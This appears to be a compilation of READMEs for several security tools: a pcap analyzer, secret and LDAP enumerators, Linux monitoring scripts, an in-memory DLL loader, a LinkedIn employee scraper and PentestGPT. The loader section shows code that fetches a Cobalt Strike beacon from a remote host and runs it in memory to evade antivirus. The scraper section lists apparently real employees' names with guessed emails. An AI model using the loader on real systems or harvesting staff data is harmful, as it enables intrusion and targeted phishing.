With Wireshark or tcpdump, you can record traffic on the network you monitor; this script helps you determine whether that recorded traffic contains harmful activity.
This Python script analyzes network traffic in a given .pcap file and attempts to detect a range of suspicious network activities and attacks.
The script also tries to detect packets containing suspicious keywords (e.g., "password", "login", "admin"); a minimal sketch of this keyword check follows the usage example below. Detected suspicious activities and attacks are reported to the user in the console.
The main functions are:
- get_user_input(): gets the path of the .pcap file from the user.
- get_all_ip_addresses(capture): returns a set containing all source and destination IP addresses.
- detect_* functions: used to detect specific attacks and suspicious activities.
- main(): performs the main operations of the script. It first gets the path of the .pcap file from the user, then analyzes the file to try to detect the specified attacks and suspicious activity.

To install and run:
git clone https://github.com/alperenugurlu/Network_Assessment.git
pip3 install -r requirements.txt
python3 Network_Compromise_Assessment.py
Example:
Please enter the path to the .pcap or .pcapng file: /root/Desktop/TCP_RST_Attack.pcap
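For illustration only, here is a minimal sketch of the packet keyword check using scapy; this is an assumption on my part, not the script's actual implementation, and the keyword list and pcap path are placeholders:

```python
# Hedged sketch: scan a pcap for payloads containing suspicious keywords.
# The keyword list and pcap path below are illustrative, not the tool's own.
from scapy.all import rdpcap, Raw

SUSPICIOUS_KEYWORDS = [b"password", b"login", b"admin"]

def find_suspicious_packets(pcap_path):
    hits = []
    for index, packet in enumerate(rdpcap(pcap_path)):
        if not packet.haslayer(Raw):
            continue
        payload = bytes(packet[Raw].load).lower()
        for keyword in SUSPICIOUS_KEYWORDS:
            if keyword in payload:
                hits.append((index, keyword.decode()))
    return hits

if __name__ == "__main__":
    for index, keyword in find_suspicious_packets("TCP_RST_Attack.pcap"):
        print(f"Packet {index}: suspicious keyword '{keyword}'")
```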
Alperen Ugurlu
https://www.linkedin.com/in/alperen-ugurlu-7b57b7178/
Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.
Gold Digger requires Python3.
virtualenv -p python3 .
source bin/activate
python dig.py --help
usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]
optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output
Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json to skip files matching specific extensions. Provide the root folder via the --directory flag.
An example structure could be:
~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/
You would provide the following command to search all three directories:
python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log
The tool will create a log file containing the scanning results. Due to the nature of regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.
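As a rough illustration of the approach (not Gold Digger's actual code; the patterns and extensions below are made up, the real ones live in gold.json and exclusions.json):

```python
# Hedged sketch of a recursive regex scan over a directory tree.
# PATTERNS and EXCLUDED_EXTENSIONS are illustrative placeholders.
import os
import re

PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "password_assignment": re.compile(r"password\s*=\s*\S+", re.IGNORECASE),
}
EXCLUDED_EXTENSIONS = {".png", ".jpg", ".zip"}

def scan(root):
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in EXCLUDED_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as handle:
                    for lineno, line in enumerate(handle, 1):
                        for label, pattern in PATTERNS.items():
                            if pattern.search(line):
                                print(f"{path}:{lineno}: possible {label}")
            except OSError:
                continue

scan(os.path.expanduser("~/Engagements/CustomerName/data/"))
```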
Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.
msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping the ldap3 library from Python in an easy-to-use interface. Like most of my tools, this one works best on Windows. Currently, when run on Unix, the tool will not resolve hostnames that are not accessible via eth0.
Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.
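For context, an anonymous bind with the ldap3 library looks roughly like this; this is a sketch under assumptions, not msLDAPDump's actual code, and the domain controller address is a placeholder:

```python
# Hedged sketch: anonymous LDAP bind and naming-context dump with ldap3.
# 10.0.0.5 is a placeholder domain controller address.
from ldap3 import ALL, Connection, Server

server = Server("10.0.0.5", get_info=ALL)
conn = Connection(server, auto_bind=True)  # no credentials: anonymous bind
print(server.info.naming_contexts)         # e.g. ['DC=corp,DC=local', ...]
conn.unbind()
```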
Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.
Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.
This is a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or during an investigation. Each script works on its own and is independent of the other scripts. The scripts can be set up to either print out their results, send them to you via mail, or use AlertR as the notification channel.
The scripts are located in the scripts/ directory. Each script contains a short summary in the header of the file with a description of what it is supposed to do, the dependencies that have to be installed (if any), and references to where the idea for the script stems from (if available).
Each script has a configuration file in the scripts/config/ directory. If the configuration file is not found during execution, the script falls back to default settings and prints out the results; hence, providing a configuration file is not strictly necessary.
The scripts/lib/
directory contains code that is shared between different scripts.
Scripts with a monitor_ prefix hold a state and are only useful for monitoring purposes. Running one of them a single time during an investigation will only show the current state of the Linux system, not the changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init argument.
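To make the monitor_ idea concrete, here is a minimal sketch of the state pattern; this is my own illustration, not the actual LSMS code, and the state-file path is hypothetical:

```python
# Hedged sketch: establish a baseline with --init, then report changes.
# STATE_FILE is a hypothetical location, not the one LSMS uses.
import hashlib
import json
import os
import sys

STATE_FILE = "/opt/LSMS/state/passwd.json"
TARGET = "/etc/passwd"

def file_hash(path):
    with open(path, "rb") as handle:
        return hashlib.sha256(handle.read()).hexdigest()

current = file_hash(TARGET)
if "--init" in sys.argv or not os.path.exists(STATE_FILE):
    os.makedirs(os.path.dirname(STATE_FILE), exist_ok=True)
    with open(STATE_FILE, "w") as handle:
        json.dump({"hash": current}, handle)
    print(f"Baseline established for {TARGET}")
else:
    with open(STATE_FILE) as handle:
        baseline = json.load(handle)["hash"]
    if current != baseline:
        print(f"ALERT: {TARGET} changed since baseline")
```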
Take a look at the header of the script you want to execute. It contains a short description of what the script is supposed to do and which requirements it has (if any). If there are requirements, install them before running the script.
The shared configuration file scripts/config/config.py
contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/
directory. If no configuration file is found, default settings are used and the results are printed out.
Finally, you can run all configured scripts by executing start_search.py
(which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.
If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:
1. Set up a notification channel that is supported by the scripts (currently: printing out, mail, or AlertR).
2. Configure the scripts that you want to run using the configuration files in the scripts/config/ directory.
3. Execute start_search.py with the --init argument to initialize the scripts with the monitor_ prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.
4. Set up a cron job as the root user that executes start_search.py (e.g., 0 * * * * root /opt/LSMS/start_search.py to start the search hourly).
Name | Script |
---|---|
Monitoring cron files | monitor_cron.py |
Monitoring /etc/hosts file | monitor_hosts_file.py |
Monitoring /etc/ld.so.preload file | monitor_ld_preload.py |
Monitoring /etc/passwd file | monitor_passwd.py |
Monitoring modules | monitor_modules.py |
Monitoring SSH authorized_keys files | monitor_ssh_authorized_keys.py |
Monitoring systemd unit files | monitor_systemd_units.py |
Search executables in /dev/shm | search_dev_shm.py |
Search fileless programs (memfd_create) | search_memfd_create.py |
Search hidden ELF files | search_hidden_exe.py |
Search immutable files | search_immutable_files.py |
Search kernel thread impersonations | search_non_kthreads.py |
Search processes that were started by a now disconnected SSH session | search_ssh_leftover_processes.py |
Search running deleted programs | search_deleted_exe.py |
Test script to check if alerting works | test_alert.py |
Verify integrity of installed .deb packages | verify_deb_packages.py |
"Python memory module" AI generated pic - hotpot.ai
Pure-Python implementation of the MemoryModule technique to load a DLL or unmanaged EXE entirely from memory.
PythonMemoryModule is a Python ctypes port of the MemoryModule technique originally published by Joachim Bauch. It can load a DLL or unmanaged EXE from memory using Python, without requiring an external native library (pyd). It leverages pefile to parse PE headers and ctypes to perform the loading.
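To illustrate the pefile part (a toy sketch, not PythonMemoryModule's internals; beacon.dll is a placeholder file name):

```python
# Hedged sketch: parse PE headers from an in-memory buffer with pefile.
import pefile

with open("beacon.dll", "rb") as handle:  # placeholder DLL
    data = handle.read()

pe = pefile.PE(data=data)
print(hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint))
print([section.Name.rstrip(b"\x00").decode() for section in pe.sections])
```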
The tool was originally conceived as a Pyramid module to provide evasion against AV/EDR by loading DLL/EXE payloads into python.exe entirely from memory; however, other use cases are possible (IP protection, in-memory loading of pyds, spinoffs for other stealthier techniques), so I decided to create a dedicated repo.
In the following example, a Cobalt Strike stageless beacon DLL is downloaded (not saved on disk), loaded in memory, and started by calling the entry point.
import urllib.request
import ctypes
import pythonmemorymodule

# Download the beacon DLL into memory; nothing is written to disk.
request = urllib.request.Request('http://192.168.1.2/beacon.dll')
result = urllib.request.urlopen(request)
buf = result.read()

# Map the PE image into the current process from the in-memory buffer.
dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)

# Resolve the exported entry point and call it to start the beacon.
startDll = dll.get_proc_addr('StartW')
assert startDll()

# Optionally unmap the module when done.
#dll.free_library()
Note: if you use staging in your malleable profile, the DLL will not be loadable with LoadLibrary, hence MemoryModule won't work either.
Using the MemoryModule technique will mostly respect the sections' permissions of the target DLL and avoid the noisy RWX approach. However, within the process memory there will be a private commit not backed by a DLL on disk, and this is a MemoryModule telltale.
Python 3 script to dump company employees from the LinkedIn API
LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.
The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format
CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.
LinkedInDumper talks to the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you; this way, even 2FA-protected accounts are supported. Furthermore, you must provide a LinkedIn company URL to dump employees from.
Obtain the li_at session cookie value, e.g. via your browser's developer tools, and provide it either persistently in the script or temporarily at runtime via the CLI flag --cookie.
usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]
options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'
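Under the hood, such a template is just a Python str.format string applied to the scraped first and last names; a toy illustration (not the tool's code):

```python
# Hedged sketch: applying an --email-format template to a scraped name.
fmt = "{0}.{1}@example.com"
first, last = "john", "doe"
print(fmt.format(first, last))  # john.doe@example.com
```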
docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'
# install dependencies
pip install -r requirements.txt
python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'
The script will return employee data as semicolon-separated values (CSV-like):
[ASCII art banner: LinkedInDumper, by LRVT]
[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter
[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-
LinkedIn will only return the first 1,000 search results when harvesting contact information. You may also need a LinkedIn Premium account once you have reached the maximum number of queries allowed for visiting profiles with a freemium LinkedIn account.
Furthermore, not all employee profiles are public. The results vary depending on the LinkedIn account you use and whether you are connected with some employees of the company you crawl. Therefore, it is sometimes not possible to retrieve the first name, last name, and profile URL of some employee accounts. The script does not display such profiles by default, as they contain placeholder values such as "LinkedIn" as the first name and "Member" as the last name. If you want to include such private profiles, use the CLI flag --include-private-profiles. Although these accounts are private, we can still obtain their position (title) and location; only the first name, last name, and profile URL are hidden.
Finally, LinkedIn users are free to name their profiles however they like. An account name can therefore contain salutations, abbreviations, emojis, middle names, etc. I tried my best to remove some of the nonsense, but this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API; this script gathers information from the "unofficial" Voyager API.
A GPT-empowered penetration testing tool.
A demo is available in resources, where we use PentestGPT to solve the HackTheBox challenge TEMPLATED (web challenge). Before installation, we recommend you take a look at this installation video if you want to use the cookie setup.
To install PentestGPT:
1. Install the requirements with pip install -r requirements.txt.
2. Configure the cookies in config. You may follow the sample: cp config/chatgpt_config_sample.py config/chatgpt_config.py.
3. In Inspect -> Network, find the connections to the ChatGPT session page https://chat.openai.com/api/auth/session and paste the cookie into the cookie field of config/chatgpt_config.py. (You may use Inspect -> Network, find the session request, and copy the cookie field in request_headers for https://chat.openai.com/api/auth/session.)
4. Fill in userAgent with your user agent in chatgpt_config.py.
5. Test the connection with python3 test_connection.py. You should see some sample conversation with ChatGPT, ending with one of the following messages:

1. You're connected with ChatGPT Plus cookie.
To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4>
## Test connection for OpenAI api (GPT-4)
2. You're connected with OpenAI API. You have GPT-4 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4 --useAPI>
## Test connection for OpenAI api (GPT-3.5)
3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
The ChatGPT connection is made through https://chat.openai.com/backend-api/conversations. Please submit an issue if you encounter any problem.

To start PentestGPT, run python3 main.py --args:
- --reasoning_model is the reasoning model you want to use.
- --useAPI sets whether you want to use the OpenAI API.
You may use the commands verified by test_connection.py, which are:
python3 main.py --reasoning_model=gpt-4
python3 main.py --reasoning_model=gpt-4 --useAPI
python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI
PentestGPT provides the following commands:
- help: show the help message.
- next: key in the test execution result and get the next step.
- more: let PentestGPT explain more details of the current step. Also, a new sub-task solver will be created to guide the tester.
- todo: show the todo list.
- discuss: discuss with PentestGPT.
- google: search on Google. This function is still under development.
- quit: exit the tool and save the output as a log file (see the reporting section below).

Use TAB to autocomplete the commands and ENTER to select an item. Similarly, use <SHIFT + right arrow> to confirm selection.

In the sub-task handler initiated by more, users can execute further commands to investigate a specific problem:
- help: show the help message.
- brainstorm: let PentestGPT brainstorm on the local task for all the possible solutions.
- discuss: discuss with PentestGPT about this local task.
- google: search on Google. This function is still under development.
- continue: exit the subtask and continue the main testing session.

After the session is over, PentestGPT saves the output in the logs folder (if you quit with the quit command). You may generate a report from a log file with python3 utils/report_generator.py <log file>. A sample report sample_pentestGPT_log.txt is also uploaded.

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
1. Fork the Project
2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
3. Commit your Changes (git commit -m 'Add some AmazingFeature')
4. Push to the Branch (git push origin feature/AmazingFeature)
5. Open a Pull Request

Distributed under the MIT License. See LICENSE.txt for more information.
Gelei Deng - gelei.deng@ntu.edu.sg